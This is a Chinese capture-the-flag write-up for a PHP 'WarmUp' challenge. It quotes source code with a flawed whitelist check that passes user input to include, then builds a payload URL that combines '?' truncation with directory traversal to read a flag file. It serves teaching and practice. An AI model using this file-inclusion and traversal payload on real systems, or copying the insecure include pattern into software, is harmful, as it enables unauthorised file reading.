打开页面,是一个大大的滑稽
查看源代码,有一个提示访问source.php
访问source.php,得到源码
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
//设置白名单
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
//若$page未设置或为空 或 $page不是字符串,返回false
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
//若$page是$whitelist的值,返回true
if (in_array($page, $whitelist)) {
return true;
}
//在$page末尾添加? 并返回添加?后 首个?之前的字符串
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
发现一个提示页面hint.php,访问得到一句话:flag not here, and flag in ffffllllaaaagggg
只有满足$_REQUEST['file']非空 && $_REQUEST['file']是字符串 && emmm::checkFile($_REQUEST['file'])为true
那么就会include $_REQUEST['file']
上面的条件很容易满足,难的是要访问ffffllllaaaagggg
因为emmm::checkFile()函数说明只能包含source.php和hint.php
关键代码:$_page = mb_substr($page, 0, mb_strpos($page . '?', '?'));
既然是以首个?截断
我们可以构造file = source.php?,这样无论如何都会返回true
?后面就是我们要访问的ffffllllaaaagggg
构造payload:
http://d021b8fe-3210-478c-b553-0cee7079e4bd.node3.buuoj.cn?file=source.php?/…/…/…/…/ffffllllaaaagggg